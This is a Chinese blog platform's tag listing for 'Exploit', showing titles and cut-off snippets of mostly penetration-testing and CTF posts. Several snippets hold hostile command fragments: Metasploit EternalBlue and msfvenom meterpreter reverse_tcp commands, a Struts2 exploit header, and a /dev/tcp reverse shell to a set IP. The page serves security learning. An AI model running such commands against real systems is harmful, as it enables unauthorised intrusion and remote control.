Exploit

漏洞挖掘——实验9 SQL Injection Attack Lab

2、阅读下面这篇文章:Bypassingnon-executable-stackduringexploitationusingreturn-to-libc.htt
一半西瓜·2020-07-29 22:35

mysql大整数溢出报错--新手入门教程 20150717

作者:OsandaMalith是的,exploit-db那篇mysqlinsertdeleteupdate注入的paper就是他写的。14年5月。
qq_27446553·2020-07-29 22:00

Metasploit(学习笔记)

MSF终端命令:(kali中Tab键自动补全)showexploits列出框架中的渗透攻击模块showpayloads列出框架中攻击载荷showauxiliary列出框架中辅助攻击模块searchname
zhaji001·2020-07-29 18:41

badstore安全测试实验

而且有高风险的,这些漏洞可以通过查找对应的exploit模块来攻击。可以很容易的获得系统权限。
cy_479577011·2020-07-29 18:36

KALI 2020 软件集成清单——漏洞利用工具集(八)

8、漏洞利用工具集8.1metasploitframework是一个渗透测试框架,用ruby语言写的,该框架集成了很多可用的exploit8.2msfpayloadcreator是一个基于用户选择生成多种类型有效载荷的包装器
Bressanone6·2020-07-29 12:08

kali 入侵win7并实现远程关机

启动metasploit输入useexploit/windows/smb/ms17_010_eternalbluesetPAYLOADwindows/x64/meterpreter/reverse_tcpsetRHOST192.168.0.254
weixin_40264215·2020-07-29 12:36

kali的payload的使用攻击之反弹型payload的使用

一、msfvenom命令简介msfvenom是payload产生器,也是shellcode代码生成器Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。
红尘卖酒人·2020-07-29 11:02

nmap脚本使用

脚本类别描述auth与用户认证相关broadcast使用广播收集网络信息brute暴力破解default默认,执行脚本(-sC)discovery与主机和服务发现相关的脚本dos与拒绝服务攻击有关的脚本exploit
一只没有感情的杀手·2020-07-29 10:50

kali linux 对Metasploittable2进行samba漏洞利用

192.168.172.129攻击过程:setp1:使用nmap探测sambanmap-sV-p139445192.168.172.129setp1:metasploit漏洞利用启动msf命令:useexploit
02be55f·2020-07-29 10:02

PWN基础2:基础理论

基础理论part11、在CTF比赛中,PWN主要是指漏洞利用,也称为exploit。2、PWN题型的解题过程一般是寻找程序中存在的漏洞,并利用该漏洞达到一定的效果,如拿到shell、获取flag等。
prettyX·2020-07-29 10:14

kali漏洞扫描笔记

漏洞扫描基于端口服务扫描结果版本信息搜索已公开的漏洞数据库使用弱点扫描器实现漏洞管理漏洞库:www.exploit-db.comkali中查找已知漏洞:searchsploit[要查找的关键字]漏洞利用代码文件在
fhl5203·2020-07-29 09:47

metasploit的SET的Credential Harvester Attack Method

环境:BT5,XP或者Win7,IE6、IE8、谷歌浏览器操作如下:root@bt:/pentest/exploits/set#.
feier7501·2020-07-29 09:13

metasploit针对性钓鱼攻击向量(BT5R3失败)

root@bt:~#cd/pentest/exploits/set/root@bt:/pentest/exploits/set#.
feier7501·2020-07-29 09:13

2014-09-23 Metasploit

MetasploitMetasploit——metereprter后门建立步骤:useexploit/windows/dcerpc/ms03_026_dcom//绑定shell,加载所用的插件?
许安念安·2020-07-29 06:46

docker逃逸

坏消息来了本人是在虚拟机中安装了具有dirtyCow漏洞的Ubuntu系统镜像;然后在该系统中安装Docker;接着下载现有的payload(exploit)代码,弄懂之后编译运行提权;实现结果为:提权之前不能获取主机用
leehaming·2020-07-29 05:34

[EGNN] Exploiting Edge Features for Graph Neural Networks 基于边缘特征的图神经网络 论文详解 CVPR 2019

文章目录1简介1.1GAT和GCN的局限性1.2EGNN的创新点2相关工作3EGNN网络3.1符号定义3.2EGNN和GNN的对比3.3Doublystochasticnormalizationofedges边的双向随机归一化3.4EGNN(A):AttentionbasedEGNNlayer3.5EGNN\(C\):ConvolutionbasedEGNNlayer3.6Edgefeatures
yyl424525·2020-07-29 02:38

Ethical Fashion-时尚也要高尚

EthicalFashionisanumbrellatermtodescribeethicalfashiondesign,production,retail,andpurchasing.Itcoversarangeofissuessuchasworkingconditions,exploitation
Ivy_InShanghai·2020-07-28 20:22

exploit - CVE-2017-5638 - Apache Struts2 S2-045

/usr/bin/python#-*-coding:utf-8-*-importurllib2importhttplibdefexploit(url,cmd):payload="%{(#_='multipart
Nixawk·2020-07-28 13:13

MSF学习笔记

MSF主要模块渗透模块(exploit):运行时会利用目标主机漏洞进行攻击。
尐猴子君ii·2020-07-28 08:36

pwn 安恒月赛unexploit

直接进入主函数查看可以供我们溢出的空间很少这里就要涉及到栈迁移了需要用到寄存器ebp,esp指令leave;retleave==movesp,ebp;popebpret==popeip我们能控制执行流然后继续跳入read函数因为read的读入位置是和ebp有关的所以可以控制栈的位置所以我们先将ebp置为bss-0x8然后跳到read读入的数据会到bss段然后将bss+0x8置为ebp我们先将剩余的
doudoudedi·2020-07-28 07:45

基于Tensorflow里CNN文本分类

进行文本分类卷积神经网络英文邮件分类语料simplistic,sillyandtedious.it'ssoladdishandjuvenile,onlyteenageboyscouldpossiblyfinditfunny.exploitativeandlargelydevoidofthedepthorsophisticationthatwouldmakewatchingsuchagra
AI算法工程师YC·2020-07-28 07:09

《白帽子讲web安全》读书笔记

第1章安全世界观攻击分两种:exploitscript早期多攻击系统和软件,能快速获得root权限。
我家面试官最好看·2020-07-28 05:56

关于CORS利用的一些方法

以下是一些很棒的帖子,可让你了解他的用法:https://www.geekboy.ninja/blog/exploiting-mi
东塔安全学院·2020-07-28 03:38

Socat简单使用及附带windows版本nc下载地址

/exploit&tcp-list
SevenBy·2020-07-27 19:50

渗透测试基础知识

生成后门msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=192.168.1.5lport=4444-fexe>test.exemsf等待连接useexploit
HyyMbb·2020-07-27 18:06

Stack Smashing On A Modern Linux System

StackSmashingOnAModernLinuxSystemhttp://www.exploit-db.com/papers/24085/StackSmashingOnAModernLinuxSystem21December
LIUXINKUN·2020-07-27 16:16

网络渗透资料大全单——漏洞库篇

美国国家应急响应中心→https://www.us-cert.gov/OSVDB——开源漏洞库→http://osvdb.orgBugtraq——赛门铁克→http://www.securityfocus.com/Exploit-DB
小陈blog·2020-07-26 21:00

网络渗透资料大全单——漏洞库篇

美国国家应急响应中心→https://www.us-cert.gov/OSVDB——开源漏洞库→http://osvdb.orgBugtraq——赛门铁克→http://www.securityfocus.com/Exploit-DB
小陈blog·2020-07-26 21:00

Shiro 回显利用工具下载

payload来自雷石安全实验室的ShiroExploit,再次感谢雷石安全实验室,雷石安全实验室牛逼plus欢迎转发支持,下载链接请关注公众号,后台回复shiro即可得到下载链接源码地址https:/
宽字节安全·2020-07-26 17:00

java反序列化提取payload之Xray高级版的shiro回显poc的提取过程

本文中xray高级版shiropayload来源于雷石安全实验室公众号发布的shiroExploit.jar感谢雷石安全实验室,雷石安全实验室牛逼本文主要描述如何从shiro的payload中提取有效payload
宽字节安全·2020-07-25 21:00

MSF使用

是一个一体化集中控制台,允许你访问到几乎所有的MSF框架选项metasploit就是一个免费的漏洞框架,利用他人人都是黑客,使用者不需要任何编程基础就可以使用check:检测漏洞是否存在msf常用命令:showexploits
卿酌南烛_b805·2020-07-23 21:17

fastjson 1.2.24 反序列化

tcp/10.154.7.128/530>&1");}catch(Exceptione){e.printStackTrace();}}publicstaticvoidmain(String[]argv){Exploite
Watanuki·2020-07-23 09:01

Metaspolit下UAC提权以及日志清除

(1)使用msfvenom生成payload常用命令:(2)本地监听监听需要用到msf的exploit/
Lushun·2020-07-19 16:00

关于CORS利用的一些方法

以下是一些很棒的帖子,可让你了解他的用法:https://www.geekboy.ninja/blog/exploiting-mi
东塔安全·2020-07-17 20:21

Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube

ThegadgetWindowsfunctioncallstobypassDEPChooseyourweaponFunctionparameters&usagetipsROPExploittranspor
dandandeshui·2020-07-15 22:36

ruby多线程例子

ruby多线程下载示例#多线程批量下载http://www.milw0rm.com/上的exploits,自动存放。
TigerKing168·2020-07-15 19:15

如何编写自己的缓冲区溢出利用程序

Linux和Solaris下的漏洞利用.本文并不介绍如何编写shellcode.要求:读者要有一点C和汇编语言基础.目标:希望本文能够尽量做到通熟易懂,使得稍有计算机基础知识的朋友看后能够亲自动手写自己的Exploit
TOMMY201112·2020-07-15 19:24

虚假新闻检测数据集

使用论文:(1)AStylometricInquiryintoHyperpartisanandFakeNews(2)ExploitingTri-RelationshipforFakeNewsDetection2
DilicelSten·2020-07-15 13:02

(3作 2015 Ruhul Sarker)A Decomposition Based Evolutionary Algorithm for Many Objective Optimization

Decompositionbasedevolutionaryalgorithmshavebeenquitesuccessfulinsolvingoptimizationproblemsinvolvingtwoandthreeobjectives.Recentlytherehavebeensomeattemptstoexploitthestrengthsofdecomposi
lilicat·2020-07-15 12:13

[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持

本题为Linux栈溢出漏洞的利用,考查LinuxCanary绕过技术及ROP(Return-Oriented-Programming)攻击负载的构造。0x01LinuxCanary介绍首先了解一下Linux的Canary保护机制。Canary是Linux众多安全保护机制中的一种,主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地
weixin_34133829·2020-07-15 05:32

通用漏洞评估方法CVSS3.0详解

1.度量(Metrics)CVSS3.0由三个基本尺度组成,基本(Base):代表着漏洞的原始属性,不受时间与环境的影响,又由Exploitability
ToEof·2020-07-15 01:53

pentestdb-master

#PentestDBhttps://github.com/alpha1e0/pentestdb提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能
g0·2020-07-15 01:25

[电子书]渗透测试框架Metasploit基础(中文版PDF)

内容:Metasploit基础知识msfclimsfconsoleexploitspayloadsdatabasesmeterpreter各节内容如下:msfconsole1.msfconsole简介1.1
chuancuili8770·2020-07-14 08:30

kail下使用exploit/windows/smb/ms17_010_eternalblue攻击win2k7练习meterpreter

1、useexploit/windows/smb/ms17_010_eternalblueoptions和payload设置如下2、攻击成功3、截屏meterpreter的screenshot命令可以获取活动用户的桌面截屏保存到相应目录
click#15·2020-07-13 22:57

metasploit后渗透入门--meterpreter

将存放在桌面上的exploit文件复制到metasploit系统指定的exploits存储路径中,并将exploit的属性设置为644.cp~/Desktop/ms14_064_ole_exploit.rb
Neil-Yale·2020-07-13 22:21

如何改写msf的module为独立的exp?

1我们这次要用的模块名称为attftp_long_filename.rb,位于/usr/share/metasploit-framework/modules/exploits/windows/tftp/
Neil-Yale·2020-07-13 22:21

Kali Linux Web 渗透测试秘籍 第七章 高级利用

7.1在Exploit-DB中搜索Web服务器的漏洞我们偶尔会在操作系统中,Web应用所使
布客飞龙·2020-07-13 21:37

Kali Liunx后渗透测试----对目标进行七种模块方式提权

目录一、实验环境二、利用msfvenom生成木马文件供目标下载三、利用exploit/multi/handler模块攻击win10和win71、利用exploit/windows/local/ask模块攻击
SuieKa·2020-07-13 21:34

kali之***XP系统1

servicepostgresqlstart开启metasploit:servicemetasploitstartroot@kali:~#msfconsole查找10-002漏洞模块search10-002useexploit
weixin_34221775·2020-07-13 18:48

演示使用Metasploit入侵Windows

启动msfconsole:#msfconsole选择一个漏洞:msf>searchplatform:windowsxpsp3exploit/windows/smb/ms08_067_ne
weixin_34001430·2020-07-13 18:04
上一页 16 17 18 19 20 21 22 23 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他